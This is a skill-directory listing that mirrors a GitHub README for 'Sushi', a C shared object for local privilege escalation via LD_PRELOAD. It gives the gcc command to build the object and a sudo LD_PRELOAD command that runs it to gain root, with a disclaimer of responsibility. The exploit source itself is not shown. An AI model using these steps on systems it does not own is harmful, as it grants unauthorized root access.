SkillAgentSearch skills...

Sushi

Sushi すし, a shared object written in C language to perform LPE (Local Privilege Escalation) within vulnerable UNIX kernels using the LD_PRELOAD check. I'M NOT RESPONSIBLE FOR ANY MISUSE OF THIS PROGRAM, USE AT YOUR OWN RISK.

Install / Use

/learn @not1cyyy/Sushi
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

Sushi

Sushi すし, a shared object written in C language to perform LPE (Local Privilege Escalation) within vulnerable UNIX kernels using the LD_PRELOAD check

Compile and run

  • Use the following command to create the shared object: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
  • Now use this shared object as a value for LD_PRELOAD and get root privileges: sudo LD_PRELOAD=/home/exploit.so find

DISCLAIMER

I'M NOT RESPONSIBLE FOR ANY MISUSE OF THIS PROGRAM, USE AT YOUR OWN RISK.

Related Skills

View on GitHub
GitHub Stars6
CategoryDevelopment
Updated2y ago
Forks0

Languages

C

Security Score

70/100

Audited on Oct 30, 2023

No findings